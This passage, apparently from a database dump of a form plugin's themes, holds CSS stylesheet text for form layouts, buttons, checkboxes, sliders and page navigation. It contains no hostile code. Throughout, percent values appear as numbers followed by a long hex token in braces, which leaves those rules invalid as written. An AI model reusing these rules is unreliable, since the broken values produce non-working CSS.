red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #30D1B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(35,'Theme 10 orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F7D3BB;\r\nborder: 1px solid #FAAA63;\r\nmargin-bottom: 10px;\r\ncolor: #FAAA63;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/01/next_hoverbg.png) url([SITE_ROOT]/images/01/01/previous_hover.png) url([SITE_ROOT]/images/01/01/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	content: \"\";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #000;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/01/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\n	background: #f58b33; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f58b33 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f58b33 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f58b33 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f58b33 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #f58b33 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #faaa63 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #f58b33 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #8D5D35;\r\n	border: 1px solid #F0C579;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #EC8E37;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F7D3BB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 2px solid #FFB471;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #e8a467; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #e8a467 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #e8a467), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #e8a467 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffcd72 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #e8a467 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #ffb471 